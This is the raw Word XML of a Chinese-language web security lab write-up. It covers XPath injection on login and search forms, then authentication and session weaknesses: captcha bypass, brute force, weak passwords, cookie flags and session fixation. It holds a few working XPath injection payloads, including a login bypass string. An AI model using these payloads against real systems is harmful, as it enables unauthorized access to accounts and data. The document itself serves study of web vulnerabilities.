        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>orm</w:t>
      </w:r>
      <w:r w:rsidR="00062E5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB79F1" w14:textId="4BD66C7B" w:rsidR="000979A5" w:rsidRDefault="000979A5" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C0C923B" wp14:editId="7EDEC882">
            <wp:extent cx="5274310" cy="1998980"/>
            <wp:effectExtent l="0" t="0" r="254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1998980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0546D777" w14:textId="148905F3" w:rsidR="006C3109" w:rsidRDefault="00FB594F" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来传输和存储数据的，类似于数据库；X</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ath就是在X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidR="00D16586">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，类似于数据库查询</w:t>
      </w:r>
      <w:r w:rsidR="00062E5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，注入语句和</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00062E5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00062E5B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CA484" w14:textId="2B5DFE74" w:rsidR="00D16586" w:rsidRDefault="00D16586" w:rsidP="00D16586">
      <w:r>
        <w:t>Login:‘ or ‘’=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F02EA8" w14:textId="67B5ED2D" w:rsidR="00062E5B" w:rsidRDefault="00D16586" w:rsidP="00BC1B2F">
      <w:r>
        <w:t>Password:‘ or ‘’=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42360595" w14:textId="3D79902C" w:rsidR="00062E5B" w:rsidRDefault="00062E5B" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>ML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>XPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入(</w:t>
      </w:r>
      <w:r>
        <w:t>Search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C9B51D" w14:textId="77777777" w:rsidR="00062E5B" w:rsidRPr="00062E5B" w:rsidRDefault="00062E5B" w:rsidP="00BC1B2F"/>
    <w:p w14:paraId="5A10AE2C" w14:textId="303A9097" w:rsidR="006C3109" w:rsidRDefault="006C3109" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470ABEF3" wp14:editId="6CEFBBB6">
            <wp:extent cx="5274310" cy="4566920"/>
            <wp:effectExtent l="0" t="0" r="254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4566920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751BA56" w14:textId="77777777" w:rsidR="00062E5B" w:rsidRDefault="00062E5B" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数Action存在注入，注入语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48664561" w14:textId="4B6E1FFF" w:rsidR="00062E5B" w:rsidRPr="006C3109" w:rsidRDefault="00062E5B" w:rsidP="00062E5B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r w:rsidRPr="00062E5B">
        <w:t>')]/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00062E5B">
        <w:t>password|a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00062E5B">
        <w:t>[contains(aa,'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF3730D" w14:textId="77028030" w:rsidR="004F42C3" w:rsidRDefault="00062E5B" w:rsidP="00062E5B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询语句为</w:t>
      </w:r>
      <w:r w:rsidRPr="00062E5B">
        <w:t>//hero[contains(genre,'   ')]/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00062E5B">
        <w:t>password|a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00062E5B">
        <w:t>[contains(aa,'    ')]/movie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F6148B" w14:textId="7851BB8B" w:rsidR="004F42C3" w:rsidRDefault="00062E5B" w:rsidP="00BC1B2F">
      <w:r>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>．</w:t>
      </w:r>
      <w:r>
        <w:t>’)] | //* | //* [(</w:t>
      </w:r>
      <w:r w:rsidR="00540593">
        <w:t>‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63695E5A" w14:textId="3611719D" w:rsidR="00705CF9" w:rsidRDefault="00227106" w:rsidP="00BC1B2F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里同样需要学习</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00540593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00540593">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidR="00540593">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00540593" w:rsidRPr="00540593">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidR="00705CF9" w:rsidRPr="00E15CF3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.w3school.com.cn/xpath/index.asp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59D8FFF0" w14:textId="74DF6DBB" w:rsidR="00705CF9" w:rsidRDefault="00705CF9" w:rsidP="00BC1B2F"/>
    <w:p w14:paraId="3A818D14" w14:textId="6FA5C4A9" w:rsidR="00705CF9" w:rsidRDefault="003C2A00" w:rsidP="00705CF9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无效认证&amp;&amp;会话管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730A8AA" w14:textId="7712CF66" w:rsidR="00746D2C" w:rsidRDefault="006758D8" w:rsidP="006758D8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00746D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无效验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FFFBB2" w14:textId="32BF1260" w:rsidR="006758D8" w:rsidRDefault="006758D8" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证码绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A18701" w14:textId="578A5EA9" w:rsidR="006758D8" w:rsidRPr="006758D8" w:rsidRDefault="006758D8" w:rsidP="006758D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证码只进行了前端验证，</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包绕过然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以暴力破解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793B4E2" w14:textId="14E38C39" w:rsidR="006758D8" w:rsidRDefault="005D3502" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>忘记功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13205865" w14:textId="6FF1DB7A" w:rsidR="005D3502" w:rsidRPr="005D3502" w:rsidRDefault="00C108EA" w:rsidP="005D3502">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该是可以</w:t>
      </w:r>
      <w:r w:rsidR="005D3502">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据回显</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示</w:t>
      </w:r>
      <w:r w:rsidR="00357C2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，穷举</w:t>
      </w:r>
      <w:r w:rsidR="005D3502">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FDC0CA" w14:textId="78872532" w:rsidR="005D3502" w:rsidRDefault="005D3502" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全的登录表单</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C985D" w14:textId="77353048" w:rsidR="005D3502" w:rsidRDefault="005D3502" w:rsidP="005D3502">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E8A2561" wp14:editId="3989B8B1">
            <wp:extent cx="5274310" cy="207708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2077085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE1F51" w14:textId="6091DBA1" w:rsidR="005D3502" w:rsidRDefault="005D3502" w:rsidP="005D3502">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名和密码直接存储在源码里。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3A859" w14:textId="1AD9598E" w:rsidR="005D3502" w:rsidRPr="005D3502" w:rsidRDefault="005D3502" w:rsidP="005D3502">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F4D5AC7" wp14:editId="07816988">
            <wp:extent cx="5274310" cy="2396490"/>
            <wp:effectExtent l="0" t="0" r="2540"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2396490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C65BF12" w14:textId="73AADBBB" w:rsidR="005D3502" w:rsidRDefault="005D3502" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登出管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A003D" w14:textId="60F85F11" w:rsidR="005D3502" w:rsidRPr="005D3502" w:rsidRDefault="00357C2E" w:rsidP="005D3502">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确的登出不应该只是返回到登录页面，还应该调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>_destroy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>销毁session</w:t>
      </w:r>
      <w:r w:rsidR="00C36F69">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E2543F" w14:textId="7CBC9CC6" w:rsidR="005D3502" w:rsidRDefault="005D3502" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴力破解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F688828" w14:textId="15EE1BB2" w:rsidR="00746D2C" w:rsidRPr="005D3502" w:rsidRDefault="005D3502" w:rsidP="005D3502">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="005873DE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证码绕过</w:t>
      </w:r>
      <w:r w:rsidR="00746D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>差不多，直接burp</w:t>
      </w:r>
      <w:r w:rsidR="00746D2C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00746D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>suite暴破。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068568F" w14:textId="6AD76445" w:rsidR="005D3502" w:rsidRDefault="00746D2C" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>弱口令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583356CC" w14:textId="688FAAC2" w:rsidR="00746D2C" w:rsidRDefault="00746D2C" w:rsidP="00746D2C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码过于简单或容易被猜解，如password、1</w:t>
      </w:r>
      <w:r>
        <w:t>23456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、admin等</w:t>
      </w:r>
      <w:r w:rsidR="00227106">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不多说。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F128504" w14:textId="2ED8BF6C" w:rsidR="00746D2C" w:rsidRPr="00746D2C" w:rsidRDefault="00746D2C" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4152FF64" w14:textId="510D63DE" w:rsidR="005D3502" w:rsidRDefault="007C73C2" w:rsidP="00746D2C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行政</w:t>
      </w:r>
      <w:r w:rsidR="00746D2C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>门户网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A823F29" w14:textId="1BB4410F" w:rsidR="00746D2C" w:rsidRDefault="00746D2C" w:rsidP="00746D2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D1CF7CC" wp14:editId="42A3A9C2">
            <wp:extent cx="5274310" cy="284734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2847340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D309E29" w14:textId="463FDCF2" w:rsidR="00746D2C" w:rsidRPr="00746D2C" w:rsidRDefault="00746D2C" w:rsidP="00746D2C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0C179E" wp14:editId="07F08F88">
            <wp:extent cx="5274310" cy="2861945"/>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861945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07265F78" w14:textId="77777777" w:rsidR="007C73C2" w:rsidRDefault="007C73C2" w:rsidP="007C73C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookies</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httponly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B24EB" w14:textId="15C2E92A" w:rsidR="007C73C2" w:rsidRDefault="007C73C2" w:rsidP="007C73C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38853FC4" wp14:editId="778BA82E">
            <wp:extent cx="5274310" cy="2519045"/>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519045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7177B08B" w14:textId="3DC471B5" w:rsidR="00806689" w:rsidRPr="007C73C2" w:rsidRDefault="00806689" w:rsidP="007C73C2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httponly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为true，则</w:t>
      </w:r>
      <w:r>
        <w:t>不能通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>来访问此cookie</w:t>
      </w:r>
      <w:r w:rsidR="00357C2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不能执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00357C2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AFE7A09" w14:textId="50333146" w:rsidR="007C73C2" w:rsidRDefault="007C73C2" w:rsidP="007C73C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookies</w:t>
      </w:r>
      <w:r>
        <w:t>(S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ecure</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F6350D" w14:textId="1E67F8DD" w:rsidR="007C73C2" w:rsidRPr="007C73C2" w:rsidRDefault="007C73C2" w:rsidP="007C73C2">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secure值为false</w:t>
      </w:r>
      <w:r w:rsidR="0093787E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000C20B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该值</w:t>
      </w:r>
      <w:r w:rsidR="00806689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用判断</w:t>
      </w:r>
      <w:r w:rsidR="00806689">
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="000C20B9">
        <w:t>是否只能通过https来传递</w:t>
      </w:r>
      <w:r w:rsidR="00806689">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E180328" w14:textId="700B2A4A" w:rsidR="007C73C2" w:rsidRPr="0093787E" w:rsidRDefault="007C73C2" w:rsidP="007C73C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="0093787E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Session值暴露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EB8B83" w14:textId="6AA93A60" w:rsidR="007C73C2" w:rsidRDefault="007C73C2" w:rsidP="007C73C2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D44FEA8" wp14:editId="618149BE">
            <wp:extent cx="5274310" cy="234950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2349500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79317659" w14:textId="6CEE4BC5" w:rsidR="005873DE" w:rsidRPr="007C73C2" w:rsidRDefault="005873DE" w:rsidP="007C73C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ession值直接出现在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B32596" w14:textId="69E21DEE" w:rsidR="007C73C2" w:rsidRDefault="00F16B9E" w:rsidP="007C73C2">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全的session值设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAFD629" w14:textId="77777777" w:rsidR="00F16B9E" w:rsidRDefault="00F16B9E" w:rsidP="00F16B9E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22A3122C" w14:textId="280F5990" w:rsidR="00F16B9E" w:rsidRDefault="00F16B9E" w:rsidP="00F16B9E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BE56FE5" wp14:editId="0A7350C4">
            <wp:extent cx="5274310" cy="358140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3581400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEBA208" w14:textId="09DD48EE" w:rsidR="00F16B9E" w:rsidRDefault="00F16B9E" w:rsidP="00F16B9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录前后session值没有变化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6789F7" w14:textId="344B0F96" w:rsidR="0093787E" w:rsidRDefault="00F16B9E" w:rsidP="0093787E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
